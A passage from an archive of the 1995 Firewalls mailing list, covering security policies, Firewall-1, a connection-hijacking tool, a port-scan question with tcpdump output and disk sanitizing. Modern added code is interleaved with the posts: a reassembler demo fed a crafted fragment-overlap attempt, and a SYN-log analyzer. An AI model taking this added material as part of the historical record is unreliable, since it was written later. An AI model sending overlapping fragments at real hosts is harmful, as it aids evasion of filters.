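    """Constructed traffic: a clean two-fragment datagram, then an overlay attempt."""
    r = Reassembler()
    r.add(Fragment("10.0.0.1", "10.0.0.2", 7, 0, True, b"GET / HT"))
    clean = r.add(Fragment("10.0.0.1", "10.0.0.2", 7, 8, False, b"TP/1.0\r\n"))
    # Second datagram: a later fragment tries to rewrite bytes 8..11 of the first piece.
    r.add(Fragment("10.0.0.1", "10.0.0.2", 8, 0, True, b"0123456789ABCDEF"))
    r.add(Fragment("10.0.0.1", "10.0.0.2", 8, 8, False, b"XXXX"))
    return clean, r.rejected


if __name__ == "__main__":
    print(demo())
```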
From firewalls-owner Sun Aug 6 12:35:16 1995
From: majordom@davesbbs.com (Majordomo)
Reply-To: majordom@davesbbs.com (Majordomo)
To: firewalls@greatcircle.com
Date: Sat, 05 Aug 1995 20:55:47
Subject: Majordomo results: unsubscribe firewalls dave@davesbbs.com

From Majordomo-Owner@GreatCircle.COM Sat Aug 5 06:29:00 1995
From: Majordomo@GreatCircle.COM
Reply-To: Majordomo@GreatCircle.COM
To: dave@davesbbs.com
Date: Sat, 5 Aug 1995 04:08:00 -0700
Subject: Majordomo results: unsubscribe firewalls dave@davesbbs.com

--

>>>> unsubscribe firewalls dave@davesbbs.com
**** unsubscribe: 'dave@davesbbs.com' is not a member of list 'firewalls'.
>>>> unsubscribe firewalls davesbbs.com **** unsubscribe: 'davesbbs.com' is not a member of list 'firewalls'. >>>> >>>> This has been an D A V E ' S P L A C E VirtualNET @1334607 **** Command 'this' not recognized. >>>> OFFICIAL EMAIL (334) 213-0554 24 hours FidoNET 1:375/201 **** Command 'official' not recognized. >>>> written at... @davesbbs.com ACNET 244:300/1 **** Command 'written' not recognized. >>>> **** Help for Majordomo@GreatCircle.COM: This is Brent Chapman's "Majordomo" mailing list manager, version 1.93-Brent. In the description below items contained in []'s are optional. When providing the item, do not include the []'s around it. It understands the following commands:

subscribe <list> [<address>]
    Subscribe yourself (or <address> if specified) to the named <list>.
unsubscribe <list> [<address>]
    Unsubscribe yourself (or <address> if specified) from the named <list>.
get <list> <filename>
    Get a file related to <list>.
index <list>
    Return an index of files you can "get" for <list>.
which [<address>]
    Find out which lists you (or <address> if specified) are on.
who <list>
    Find out who is on the named <list>.
info <list>
    Retrieve the general introductory information for the named <list>.
lists
    Show the lists served by this Majordomo server.
help
    Retrieve this message.
end
    Stop processing commands (useful if your mailer adds a signature).

Commands should be sent in the body of an email message to "Majordomo@GreatCircle.COM". Commands in the "Subject:" line NOT processed. If you have any questions or problems, please contact "Majordomo-Owner@GreatCircle.COM". *Forwarded by Dave From firewalls-owner Sun Aug 6 15:36:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18978 for firewalls-outgoing; Sun, 6 Aug 1995 15:13:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA18928 for ; Sun, 6 Aug 1995 15:13:46 -0700 Received: from psyche.the-wire.com(198.53.192.2) by miles via smap (V1.3) id sma018913; Sun Aug 6 15:13:06 1995 Received: from anton.the-wire.com (anton.the-wire.com [198.53.192.186]) by psyche.the-wire.com (8.6.10/8.6.9) with SMTP id SAA17703 for ; Sun, 6 Aug 1995 18:09:49 -0400 Date: Sun, 6 Aug 1995 18:09:49 -0400 Message-Id: <199508062209.SAA17703@psyche.the-wire.com> X-Sender: anton@psyche.the-wire.com Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: anton@the-wire.com (Anton J Aylward) Subject: Re: InfoSec policies made easy? - YES!! X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk jcarrol@wellspring.us.dg.com says: >Thought this might be relevant, as this topic comes up from time to >time. Feel free to comment. Policies aren't my forte, so please >direct your responses to the list. > >I was cleaning up around my desk when I came across a promo entitled >"Information Security Policies Made Easy". Dang near forgot about >this. I'll forward noteworthy points for comment: > Policies are my forte, so here goes. Policies should always be the starting point. 
Even if they are only of the form "Everything is prohibited except that which is explicitly permitted." Policies are a statement of what the organization is trying to achieve. Like the old adage about lack of planning, policies, and documenting them, and getting management (or client) sign-off is essential. Cresson's book, which I won't call a bible, but it's within arm's reach as I type this, does relieve you of an __awful__ lot of detail work in writing policies. You can go to a client with this and have better than 85% of the work addressed. Not done; not covered, just addressed. Think of it as a well fleshed out "boilerplate". More to the point, it is comprehensive. Too many sites I've been into bog down and exhaust themselves in detail. The detail _is_ necessary. It's just that by the time they've done all the stuff on access permissions and password aging - which us UNIX types just take for granted in a proper SVR4 ( poke at Jim and the default SVR4 from DG there ;-) ) they are worn out. They seem to think they've put all the effort they need to in, and stop. Sigh. Recently, a large brewery here in Toronto had a security problem. Someone came in and _stole_ some executive laptops. So much for dial-in passwords and Novell style security. Sadly, it's a situation where you have to get it all right or it doesn't work at all. And that is why it has to be policy driven. Good book. Go Buy it. 
-- Anton J Aylward The Strahn and Strachan Group Inc Information Security Consultants Voice: (416) 494-8661 Fax: (416) 494-8803 From firewalls-owner Sun Aug 6 19:30:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA28995 for firewalls-outgoing; Sun, 6 Aug 1995 19:00:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA28932 for ; Sun, 6 Aug 1995 19:00:22 -0700 Received: from hardwired.momentum.com.au(203.2.238.132) by miles via smap (V1.3) id sma028843; Sun Aug 6 18:59:16 1995 Received: (from uucp@localhost) by hardwired.momentum.com.au (8.6.12/8.6.12) id JAA07805 for ; Mon, 7 Aug 1995 09:53:50 +0800 Received: from aristoi.momentum.com.au(203.2.238.138) by hardwired via smap (V1.3mjr) id sma007802; Mon Aug 7 09:53:39 1995 X-Sender: todd@hardwired.momentum.com.au Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 7 Aug 1995 09:57:31 +0800 To: Firewalls@GreatCircle.COM From: todd@momentum.com.au (Todd Hooper) Subject: Re: Firewall-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Strata writes: >Am I missing something here, like a later release than 1.0.7c? Yes - the current version is 1.2.1. I understand Checkpoint shipped 1.2 some months ago. SunSoft announced it in July. 
Todd -- Todd Hooper Internet : todd@momentum.com.au Momentum Pty Ltd Phone : 09 483 2649 Western Australia Fax : 09 380 4371 From firewalls-owner Sun Aug 6 20:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00746 for firewalls-outgoing; Sun, 6 Aug 1995 20:05:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00698 for ; Sun, 6 Aug 1995 20:05:51 -0700 Received: from ha.org.hk(202.64.48.240) by miles via smap (V1.3) id sma000667; Sun Aug 6 20:04:56 1995 Received: (from pwtyeung@localhost) by ha.org.hk (8.6.12/8.6.6) id LAA40531; Mon, 7 Aug 1995 11:01:15 +0800 Date: Mon, 7 Aug 1995 11:01:14 +0800 (HKT) From: Patrick Yeung Subject: IP translation in Firewall-1 To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anybody know if Firewall-1 (release 1.2.1) can do IP translation? That means it can remap the internal networks' IPs to the Firewall's IP. 
Regards, Patrick Yeung From firewalls-owner Sun Aug 6 20:47:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00771 for firewalls-outgoing; Sun, 6 Aug 1995 20:07:54 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00755 for ; Sun, 6 Aug 1995 20:07:51 -0700 Received: from bass.com.my(161.142.248.42) by miles via smap (V1.3) id sma000749; Sun Aug 6 20:07:23 1995 Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA10421 (5.67a/IDA-1.5 for ); Mon, 7 Aug 1995 11:05:46 +0800 Received: by bass.bass.com.my (4.1/SMI-4.1) id AA01069; Mon, 7 Aug 95 11:03:31 MYT Date: Mon, 7 Aug 1995 11:00:30 +0800 (MYT) From: Tham Huei Hwan Subject: Re: IPWatcher To: Cameron_A_P@ceo.sbic.co.za Cc: firewalls@greatcircle.com In-Reply-To: <9508021235.AA00151@zork.sbic.co.za> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 2 Aug 1995 Cameron_A_P@ceo.sbic.co.za wrote: > Message: > I have come across a package on Internet Called IPWatcher. This > package renders Firewalls and Smart Cards Useless in that it allows > the person using it to Hijack and take over an established connection. > > The URL to get more Info on this package is > http://nad.infostructure.com/watcher.html > > My Question and problem is how do you prevent this from happening. > Also are there other Hacker tools that can do this. > > -- > Andrew Cameron > Cameron_A_P@ceo.sbic.co.za > > Dear Mr. Andrew Cameron, Could you please e-mail me the information from http://nad.infostructure.com/watcher.html, because on my site I can only do e-mail and not ftp. Thanks. 
E-mail: Tham.Huei.Hwan@bass.com.my From firewalls-owner Mon Aug 7 02:31:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA08925 for firewalls-outgoing; Mon, 7 Aug 1995 02:11:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA08917 for ; Mon, 7 Aug 1995 02:11:33 -0700 Received: from sioux.eel.ufl.edu(128.227.56.139) by miles via smap (V1.3) id sma008914; Mon Aug 7 02:11:16 1995 Received: from iriquois.eel.ufl.edu by sioux.eel.ufl.edu (1.37.109.16/4.09) id AA184816600; Mon, 7 Aug 1995 05:10:01 -0400 From: "Mahesh Ramachandran" Message-Id: <199508070910.AA184816600@sioux.eel.ufl.edu> Subject: Question: continuous stream of syn packets To: firewalls@greatcircle.com Date: Mon, 7 Aug 1995 05:10:00 -0400 (EDT) Cc: rr (Mahesh Ramachandran) Organization: Electrical Engineering, University of Florida ___ X-Phone: (904) 392-4568 X-Operating-System: HP-UX A.09.01 9000/715 ( . ) X-Url: http://www.eel.ufl.edu/~rr -"-"- X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 3067 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I've been seeing a continuous stream of TCP SYN packets coming to one of the hosts on TCP ports 3333 through 3338. There isn't and never was anything on those ports. Could someone provide me a clue why a remote host would continuously be trying to access these ports? I've appended a sample tcpdump output below. thx -rr --------------------------------------------------------------------------- from tcpdump 'tcp[13] & 3 != 0' src ... 
11:44:05.00 src-host.2641 > dst-host.3333: S 1943353091:1943353091(0) win 8192
11:44:05.00 src-host.2642 > dst-host.3334: S 1943491933:1943491933(0) win 8192
11:44:05.00 src-host.2643 > dst-host.3335: S 1943652296:1943652296(0) win 8192
11:44:05.00 src-host.2644 > dst-host.3336: S 1943834739:1943834739(0) win 8192
11:44:05.00 src-host.2645 > dst-host.3337: S 1943910593:1943910593(0) win 8192
11:44:06.00 src-host.2646 > dst-host.3338: S 1943978488:1943978488(0) win 8192
11:45:05.00 src-host.2653 > dst-host.3333: S 1959808612:1959808612(0) win 8192
11:45:05.00 src-host.2654 > dst-host.3334: S 1959885897:1959885897(0) win 8192
11:45:05.00 src-host.2655 > dst-host.3335: S 1960018804:1960018804(0) win 8192
11:45:05.00 src-host.2656 > dst-host.3336: S 1960340481:1960340481(0) win 8192
11:45:05.00 src-host.2657 > dst-host.3337: S 1960404666:1960404666(0) win 8192
11:45:05.00 src-host.2658 > dst-host.3338: S 1960568529:1960568529(0) win 8192

from tcpdump -v src ...

12:05:04.976100 src-host.2898 > dst-host.3333: S 2299783809:2299783809(0) win 8192 (ttl 50, id 50673)
12:05:05.074249 src-host.2899 > dst-host.3334: S 2299873647:2299873647(0) win 8192 (ttl 50, id 50676)
12:05:05.178567 src-host.2900 > dst-host.3335: S 2299954453:2299954453(0) win 8192 (ttl 50, id 50681)
12:05:05.282498 src-host.2901 > dst-host.3336: S 2300146817:2300146817(0) win 8192 (ttl 50, id 50683)
12:05:05.437370 src-host.2902 > dst-host.3337: S 2300409262:2300409262(0) win 8192 (ttl 50, id 50688)
12:05:05.616838 src-host.2903 > dst-host.3338: S 2300508683:2300508683(0) win 8192 (ttl 50, id 50690)
------------------------------------------------------------------------------ -- From firewalls-owner Mon Aug 7 04:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA11710 for firewalls-outgoing; Mon, 7 Aug 1995 03:58:22 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA11690 for ; Mon, 7 Aug 1995 03:58:18 -0700 Received: from 
myall.awadi.com.au(150.207.2.65) by miles via smap (V1.3) id sma011684; Mon Aug 7 03:57:52 1995 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA17971; Mon, 7 Aug 95 20:23:22 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA13282; Mon, 7 Aug 1995 20:19:44 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9508071049.AA13282@bunya.awadi> Subject: Re: Sanitizing SCSI disks To: firewalls@greatcircle.com Date: Mon, 7 Aug 1995 20:19:45 +0930 (CST) X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Tucker, R., SrA, 28CS/SCSNS: > >A small positive or negative current gets sent to the disk through the heads, >charging the surface of the disk. Like ALL electrical currents, it flows in >a wave pattern (frequency). The overwrite also flows in the same wave >pattern, BUT NOT IN THE EXACT LOCATION AS THE ORIGINAL WAVE PATTERN. >Approximately 40% of the waves match after the first overwrite, leaving >about 60% you could still bring back, provided you have the right software >(some cases hardware is also necessary...I'm not the REAL expert on this, >but I have seen how OSI does this.) I forget the actual algorithm on how >much gets erased at each pass, but I do remember on the chart that after the >first pass, approx. 60% could still be recovered, and it went all the way >down to after the 99th pass, approx. .06% could still be recovered. > Oops, nice theory but totally ignores the head positioning slop in the mechanics of the system. If you can rip the platters out and run them under a suitable setup then you can pick up the tracks out of the slop and get the data back. This is why _very_ paranoid people (aka security officers) will not accept the overwriting of the hard disk - you cannot _prove_ that all the data has been overwritten. 
Sure they may relent and downgrade the classification of the hardware to a lower level but that box must still be secured to the highest level of the data that was stored on it. Well, that's the way it works here in Australia, I would imagine it is not too much different elsewhere. > >Another thing you can do, if it's possible to separate your disk (the little >case with the platters) from the controller board (or anything else you >don't want zapped) is to run it through a degausser. Now on this one you'll >have to look up the length of time, Oersteds (sp?), and for what >coercivity, etc. as they change from HD to HD. > Bzzzt wrong - *if* you manage to degauss the sucker at all then you have just stuffed the hard disk totally. All the modern hard disks I have seen use voice coil head drives which implies that one of the platter surfaces is devoted to disk positioning servo information. Ever wondered why disks have an odd number of recording surfaces? This is the reason why, the servo is on one of these surfaces. Degaussing the servo surface implies that the disk drive electronics will no longer know where the f*ck the head is which makes the disk useless. -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". 
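Returning to Mahesh Ramachandran's tcpdump listing two messages up: the things a responder would want to know about that capture (is one source sweeping a fixed port range, how often does it come back, do the source ports step by one so it looks like a single process opening sockets in a loop) can be pulled out mechanically rather than by eye. The script below is an added example, not part of any post in this thread. It parses lines in the format tcpdump printed in that message (the plain and the -v form both match; the trailing ttl/id detail is simply not consumed) and summarizes the pattern per source/destination pair. The embedded sample is the post's own first listing, reproduced so the script runs offline; the 5-second burst gap is an assumption chosen for the example.

```python
import re
from collections import defaultdict
from datetime import timedelta

# The post's own first tcpdump listing, embedded so the script runs offline.
SAMPLE = """\
11:44:05.00 src-host.2641 > dst-host.3333: S 1943353091:1943353091(0) win 8192
11:44:05.00 src-host.2642 > dst-host.3334: S 1943491933:1943491933(0) win 8192
11:44:05.00 src-host.2643 > dst-host.3335: S 1943652296:1943652296(0) win 8192
11:44:05.00 src-host.2644 > dst-host.3336: S 1943834739:1943834739(0) win 8192
11:44:05.00 src-host.2645 > dst-host.3337: S 1943910593:1943910593(0) win 8192
11:44:06.00 src-host.2646 > dst-host.3338: S 1943978488:1943978488(0) win 8192
11:45:05.00 src-host.2653 > dst-host.3333: S 1959808612:1959808612(0) win 8192
11:45:05.00 src-host.2654 > dst-host.3334: S 1959885897:1959885897(0) win 8192
11:45:05.00 src-host.2655 > dst-host.3335: S 1960018804:1960018804(0) win 8192
11:45:05.00 src-host.2656 > dst-host.3336: S 1960340481:1960340481(0) win 8192
11:45:05.00 src-host.2657 > dst-host.3337: S 1960404666:1960404666(0) win 8192
11:45:05.00 src-host.2658 > dst-host.3338: S 1960568529:1960568529(0) win 8192
"""

# Matches the SYN lines as tcpdump printed them in the post. Anchored only at
# the start, so "-v" detail such as "(ttl 50, id 50673)" is left unconsumed.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?P<src>\S+)\.(?P<sport>\d+)\s+>\s+"
    r"(?P<dst>\S+)\.(?P<dport>\d+):\s+S\s+"
    r"(?P<seq>\d+):\d+\(\d+\)\s+win\s+(?P<win>\d+)"
)


def parse(text):
    """Yield one record per SYN line; lines that do not match are ignored."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        hh, mm, ss = m.group("ts").split(":")
        yield {
            "t": timedelta(hours=int(hh), minutes=int(mm), seconds=float(ss)),
            "src": m.group("src"), "sport": int(m.group("sport")),
            "dst": m.group("dst"), "dport": int(m.group("dport")),
            "seq": int(m.group("seq")), "win": int(m.group("win")),
        }


def bursts(records, gap=timedelta(seconds=5)):
    """Group time-ordered records into bursts separated by more than `gap`
    (the 5 s figure is an assumption made for this example)."""
    groups, current = [], []
    for r in sorted(records, key=lambda rec: rec["t"]):
        if current and r["t"] - current[-1]["t"] > gap:
            groups.append(current)
            current = []
        current.append(r)
    if current:
        groups.append(current)
    return groups


def summarize(text):
    """Per (src, dst) pair: target ports, burst count, spacing between bursts,
    and whether source ports step by exactly one inside each burst."""
    by_pair = defaultdict(list)
    for r in parse(text):
        by_pair[(r["src"], r["dst"])].append(r)
    report = {}
    for pair, recs in by_pair.items():
        groups = bursts(recs)
        dports = sorted({r["dport"] for r in recs})
        sequential = all(
            [r["sport"] for r in g] == list(range(g[0]["sport"], g[0]["sport"] + len(g)))
            for g in groups
        )
        periods = [
            (groups[i + 1][0]["t"] - groups[i][0]["t"]).total_seconds()
            for i in range(len(groups) - 1)
        ]
        report[pair] = {
            "dports": dports,
            "contiguous_range": dports == list(range(dports[0], dports[-1] + 1)),
            "bursts": len(groups),
            "sequential_sports": sequential,
            "period_seconds": periods,
        }
    return report


if __name__ == "__main__":
    for pair, facts in summarize(SAMPLE).items():
        print(pair, facts)
```

On the post's data the summary comes back as a contiguous 3333-3338 range, two bursts sixty seconds apart, and source ports climbing by one within each burst. Fed a longer capture (tcpdump output on stdin, or a `-v` listing) the same script tells you whether that regularity holds over hours, which is the fact you want before deciding between a misconfigured client retrying on a timer and something that deserves a call to the remote site's administrator.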
From firewalls-owner Mon Aug 7 05:04:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA14436 for firewalls-outgoing; Mon, 7 Aug 1995 04:56:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA14420 for ; Mon, 7 Aug 1995 04:56:34 -0700 Received: from cbisgate.cbis.com(155.90.248.205) by miles via smap (V1.3) id sma014416; Mon Aug 7 04:55:49 1995 Received: from notes (notes.cbis.com) by cbisgate.cbis.com (4.1/SMI-4.1) id AA29182; Mon, 7 Aug 95 07:54:36 EDT Received: by notes (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA0216; Mon, 07 Aug 95 07:56:06 -0700 Message-Id: <9508071456.AA0216@notes> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 4C46F2B85EBABDDF852562110040F270; Mon, 7 Aug 95 07:56:05 To: firewalls-digest From: Warren Moore Date: 7 Aug 95 7:51:49 EDT Subject: Re: NCSA X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Padgett sez >Am sure that they have the same goals for firewalls as they had for viruses. Cheers, whistles, applause... 
Warren From firewalls-owner Mon Aug 7 05:28:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA13985 for firewalls-outgoing; Mon, 7 Aug 1995 04:31:40 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA13941 for ; Mon, 7 Aug 1995 04:31:34 -0700 From: F.Wetzels@amc.uva.nl Received: from amccca.amc.uva.nl(145.18.202.35) by miles via smap (V1.3) id sma013844; Mon Aug 7 04:30:30 1995 Received: from amcnol.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01HTSKJVLWUO000D4W@amc.uva.nl>; Mon, 7 Aug 1995 13:29:08 MET Received: from amchelix.amc.uva.nl by amcnol.amc.uva.nl (5.0/SMI-5.0) id AA19462; Mon, 7 Aug 1995 13:29:05 +0200 Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA00464; Mon, 7 Aug 1995 13:29:04 +0200 Date: Mon, 07 Aug 1995 13:29:04 +0200 Subject: Re: IP translation in Firewall-1 To: firewalls@greatcircle.com Message-id: <9508071129.AA00464@amchelix.amc.uva.nl> X-Envelope-to: firewalls@greatcircle.com Content-transfer-encoding: 7BIT Content-length: 587 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk fpmw> Does anybody know if Firewall-1 (release 1.2.1) can do fpmw> IP translation? That means it can remap the internal networks' IPs to fpmw> the Firewall's IP. And, most important, it can prevent static route loops when using one (cisco) router and secure nets. Frank. ------------------------------------------------- F.P.M. 
Wetzels ADIV/CNS D01-329 wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662916 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Mon Aug 7 05:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA14261 for firewalls-outgoing; Mon, 7 Aug 1995 04:46:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA14245 for ; Mon, 7 Aug 1995 04:46:33 -0700 Received: from cbisgate.cbis.com(155.90.248.205) by miles via smap (V1.3) id sma014239; Mon Aug 7 04:46:01 1995 Received: from notes (notes.cbis.com) by cbisgate.cbis.com (4.1/SMI-4.1) id AA28695; Mon, 7 Aug 95 07:44:34 EDT Received: by notes (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AB0210; Mon, 07 Aug 95 07:46:03 -0700 Message-Id: <9508071446.AB0210@notes> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 9B56113B523C1CC185256211003F291D; Mon, 7 Aug 95 07:46:03 To: firewalls-digest From: Warren Moore Date: 7 Aug 95 7:44:06 EDT Subject: Re: InfoSec policies made easy? X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jim Carroll says: >I was cleaning up around my desk when I came across a promo entitled >"Information Security Policies Made Easy". Dang near forgot about >this. I'll forward noteworthy points for comment: ...snip... >The price is (or at least *was*) US$495. If the general feeling is a >positive one, I'll post The Gory Commercial Details. :P This book has been around for 3 or 4 years now. If you happen to be a member of the Computer Security Institute, you've been seeing excerpts from it in each issue of their newsletter. IMHO, it would be a decent *starting* point if you had absolutely nothing in place, and didn't have the time or inclination to dig up all the stuff yourself. 
If you're in that situation, then it's probably worth it...however, there's little likelihood that you wouldn't have to modify the policies for your own location. Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. From firewalls-owner Mon Aug 7 11:52:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23249 for firewalls-outgoing; Mon, 7 Aug 1995 11:21:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23121 for ; Mon, 7 Aug 1995 11:20:50 -0700 From: strata@virtual.net Received: from virtual-city.virtual.net(140.174.91.20) by miles via smap (V1.3) id sma023036; Mon Aug 7 11:19:51 1995 Received: by virtual.net (4.1/SMI-4.1) id AA29847; Mon, 7 Aug 95 11:25:19 PDT Date: Mon, 7 Aug 95 11:25:19 PDT Reply-To: strata@virtual.net To: firewalls@greatcircle.com, support@checkpoint.com Subject: Firewall-1 Message-Id: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to thank the folks who pointed out that Firewall-1 is currently at 1.2.1, I will be looking at a current copy soon. I am investigating why a certain SF Bay reseller handed me 1.0.7c as "the latest copy" less than 60 days ago, and will put them in touch with support@checkpoint.com. I apologize to the folks at Checkpoint for not talking to them first, generally I trust my resellers to have economic incentive to give me current products. Cheers, _Strata PS- and yes, I know that the situation I was trying to set up can be IP spoofed, I was trying to test a subset of what I wanted to do rather than a sole component of a production firewall handling of FTP. But thanks also to the folks who pointed that out. ************************************************************************* PGP-- Phil Gets Prosecuted (Persecuted?) 
Support the Zimmerman Legal Defense Fund ==> Email: zldf@clark.net http://www.netresponse.com/zldf ************************************************************************* INTERNET Installations, Training, Publishing, Security M. Strata Rose 408-733-UNIX (8649) strata@virtual.net ************************************************************************* From firewalls-owner Mon Aug 7 13:00:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26198 for firewalls-outgoing; Mon, 7 Aug 1995 12:35:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26119 for ; Mon, 7 Aug 1995 12:35:40 -0700 Received: from ns1.infonautics.com(199.99.164.5) by miles via smap (V1.3) id sma026065; Mon Aug 7 12:34:44 1995 Received: from adminsrv.infonautics.com by ns1.infonautics.com (4.1/3.1.090690-Infonautics Corporation-ELAW-S1S4special) id AA14956; Mon, 7 Aug 95 15:33:29 EDT Received: from spock (spock.softeng.infonautics.com [199.99.164.43]) by adminsrv.infonautics.com (8.6.11/8.6.11) with ESMTP id OAA05802 for ; Mon, 7 Aug 1995 14:33:40 -0500 Received: (bobb@localhost) by spock (8.6.11/8.6.11) id TAA06701 for firewalls@greatcircle.com; Mon, 7 Aug 1995 19:33:21 GMT From: "Bob Bracalente -- MRJ" Message-Id: <9508071533.ZM6699@spock.softeng.infonautics.com> Date: Mon, 7 Aug 1995 15:33:21 -0400 X-Mailer: Z-Mail (3.1.0 22feb94 MediaMail) To: firewalls@greatcircle.com Subject: using suns/sunos for gateway host(s) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to ~The Firewall Book~, things like IP forwarding and IP source routing should be disabled on gateway hosts used to construct a firewall. I called sun tech support, and not surprisingly they didn't have a clue how to modify the 4.1.3 kernel to achieve this. If anyone could give me some pointers, I'd appreciate it. 
Thanks, Bob From firewalls-owner Mon Aug 7 13:35:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA28063 for firewalls-outgoing; Mon, 7 Aug 1995 13:18:15 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA28040 for ; Mon, 7 Aug 1995 13:18:11 -0700 Received: from kant.newsedge.com(192.206.82.2) by miles via smap (V1.3) id sma028031; Mon Aug 7 13:18:02 1995 Received: from herne.newsedge.com by newsedge.com (4.1/SMI-4.1) id AA06355; Mon, 7 Aug 95 16:12:47 EDT Date: Mon, 7 Aug 95 16:19:40 EST Message-Id: <9508071619.AA17676@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: Subject: Firewall-1 X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Original-From: strata@virtual.net Original-Date: Mon, 7 Aug 95 11:25:19 PDT >I would like to thank the folks who pointed out that Firewall-1 is currently >at 1.2.1, I will be looking at a current copy soon. I am investigating why a >certain SF Bay reseller handed me 1.0.7c as "the latest copy" less than 60 >days ago, and will put them in touch with support@checkpoint.com. Check out: http://www.checkpoint.com/free.html It details a free upgrade offered by checkpoint to 1.2.1 With a free upgrade it's even more of a bummer that they couldn't be bothered to ship you latest code. 
